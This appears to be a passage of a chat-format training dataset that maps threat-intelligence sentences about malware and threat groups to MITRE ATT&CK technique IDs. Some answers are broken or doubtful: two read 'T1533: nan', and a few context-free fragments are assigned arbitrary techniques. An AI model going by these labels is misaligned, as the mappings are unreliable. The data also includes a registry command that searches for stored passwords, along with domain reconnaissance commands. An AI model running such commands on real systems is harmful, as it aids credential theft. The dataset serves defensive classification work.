Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has gained initial access via vulnerable webservers.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian has the ability to use /bin/sh to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe sets its own executable file's attributes to hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used CHM files to move concealed payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has searched the compromised system for banking applications.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,bootkit### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used regsvr32.exe to execute scripts.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has included a base64 encoded executable.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 leveraged spearphishing emails with malicious links to initially compromise victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has a command to write random data across a file and delete it.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries or executables .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has dumped credentials, including by using Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has targeted victims with e-mails containing malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used the Get-AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique may bypass system logging and security monitors such as security information and event management products .### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's installer plugin can schedule rundll32.exe to load the dispatcher.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to identify the users on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects information from the victim about its IP addresses and MAC addresses.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream matches the version of the host MS Office application.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz can monitor content saved to the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to download additional components and malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POORAIM has used AOL Instant Messenger for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used a task name associated with Windows SQM Consolidator.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MSIL file contains the packed core payload in its .Net resource section### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world.Infection VectorsThe attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards### Assistant: T1533: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Properties within parts may reference shared public resources accessed via online URLs.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya's initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has also delivered compressed payloads in ZIP files to victims.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can modify registry values within the Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap registry key.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS before later being compiled into a proper executable binary with a bundled compiler and execution framework.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used EternalBlue exploits for lateral movement.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has used several different keyloggers.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen and mmap respectively.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS .### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has the ability to remove all files created during the dropper process.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CVE-2014-4113 is a privilege escalation vulnerability that was disclosed publicly on 2014-10-14### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork also enumerated all available drives on the victim's machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SierraCharlie uses RDP for propagation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tool Type Internal Name Industry Name Backdoor Poison Frog BONDUPDATER Backdoor Glimpse Updated BONDUPDATER Webshell HyperShell TwoFace loader Webshell HighShell TwoFace payload Webshell Minion TwoFace payload variant DNS Hijacking Toolkit webmask Related to DNSpionage Table 1### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers: a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities b) CVE-2010-1871: JBoss Seam Framework remote code execution c) JBoss AS 3/4/5/6: Remote Command Execution (exploit) d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can delete downloaded executables after running them.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The systemd service manager is commonly used for managing background daemon processes and other system resources.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can stop anti-virus services on a compromised host.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,2 Downloads a file to the system### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi executes received commands with wmic.exe .### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used exploits to increase their levels of rights and privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples for both Word and Excel have been discovered and published.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK has the ability to identify the installed anti-virus product on the compromised host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute scripts/commands and receive the results via HTTP requests### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has used Python to implement its DGA.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 collected data from local victim systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DRIVE Lists the logical drives and the type, as well the total/free space of the fixed devices### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, adversaries may perform SSH tunneling , which involves forwarding arbitrary data over an encrypted SSH tunnel.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework., reg query HKCU /f password /t REG_SZ /s ### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools CTU researchers observed BRONZE UNION using the following tools in intrusions since the 2015 analysis, but clients should assume that the threat group still has access to the previously reported tools### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has used a Base64 key to decode its components.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\; the malicious file by the same name is saved in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape can run cmd through an IRC channel.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can take a desktop screenshot and save the file into \ProgramData\Mail\MailAg\shot.png.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note that the libraries are different from the utilities.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can gather browser usernames and passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper may attempt to establish persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OpenClipboard() ### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear has used byte randomization to obscure its behavior.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's installer plugin can schedule a new task that loads the dispatcher on boot/logon.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has a command to get the victim's domain and NetBIOS name.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Video or image files may be written to disk and exfiltrated later.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerStallion modifies the MAC times of its local log files to match that of the victim's desktop.ini file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can implement use of proxies to pivot traffic.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Python is a very popular scripting/programming language, with capabilities to perform many functions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 enumerated administrative users and DC servers using the commands net localgroup administrators and net group ""Domain Controllers"" /domain.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rundll32.exe is used as a way of executing Flame at the command-line.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbreon provides access to the system via SSH or any other protocol that uses PAM to authenticate.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 captured screenshots and desktop video recordings.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can list files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used spearphishing attachments to deliver initial access payloads.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp's passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has prompted victims to accept macros in order to execute the subsequent payload.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has used HTTP for C2 connections.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has stored collected information in the Application Data directory on a compromised host.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center .### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp deletes files to remove evidence on the machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 renamed software and DLL's with legitimate names to appear benign.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used scheduler and schtasks to create new tasks on remote hosts as part of lateral movement.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both responses instruct the malware to download and load a remote plugin### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file .### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variant of ADVSTORESHELL encrypts some C2 with 3DES.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka uses DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can scan for removable media to collect data.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PS1 can utilize a PowerShell loader.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can collect the IP address and NetBIOS name of an infected machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has downloaded additional malware to execute on victim systems.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used web shells for persistence or to ensure redundant access.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can use Dropbox to receive commands and upload stolen data.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can enumerate active services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use Masquerading to make XDG autostart entries look as if they are associated with legitimate programs.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may register for web services that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In many payment card data breaches, a point-of-sale (POS) system is infected with malware that searches for specific processes in memory known to store card data in plain text### Assistant: T1533: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has used a packed installer file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer uses the command appDir=""$"" and $"" to construct installation paths.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 obfuscates files or information to help evade defensive measures.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique allows them to map network resources and make lateral movements inside the network, landing in the perfect machine to match the attacker’s interest### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot decodes embedded XOR strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,COM is an inter-process communication component of the native Windows application programming interface that enables interaction between software objects, or executable code that implements one or more interfaces.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform different forms of active scanning depending on what information they seek to gather.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VaporRage can deobfuscate XOR-encoded shellcode prior to execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can send a file containing victim system information to C2.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the event this is successful the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\services\ In the event it is not successful, this alternative path will be used instead: %APPDATA%\microsoft\mmc\ It proceeds to load and decrypt and embedded bitmap resource file### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used crontab to download and run shell scripts every minute to ensure persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can leverage a computer's peripheral devices or applications to capture audio recordings for the purpose of listening into sensitive conversations to gather information.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 uses the Skype API to record audio and video calls.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash has destroyed Linux-based databases as part of its ransomware capabilities.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may backdoor web servers with web shells to establish persistent access to systems.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can collect the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used SCP to update the miner from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck enumerates Registry keys associated with event logs.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vasport is capable of tunneling though a proxy.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeroaccess is a kernel-mode rootkit.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Accounts, and/or initial access , Drive-by Compromise, or Trusted Relationship.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can perform port scanning of TCP and UDP ports.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can exfiltrate collected documents through C2 channels.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools used by Gamaredon Group are capable of downloading and executing additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor can obtain application window titles and then determines which windows to perform Screen Capture on.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password spraying uses one password , or a small list of commonly used passwords, that may match the complexity policy of the domain.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to exfiltrate data over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has a module to list the processes running on a machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to identify any anti-virus installed on the infected system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has the ability to identify the domain of the compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperStack can use default credentials to connect to IPC$ shares on remote machines.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Group123 Links? As we explore the Korean malware landscape, we always have burning questions relating to any possible links with Group123### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has used the ""WNetOpenEnumW"", ""WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has used malicious VBA code against the target system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT created 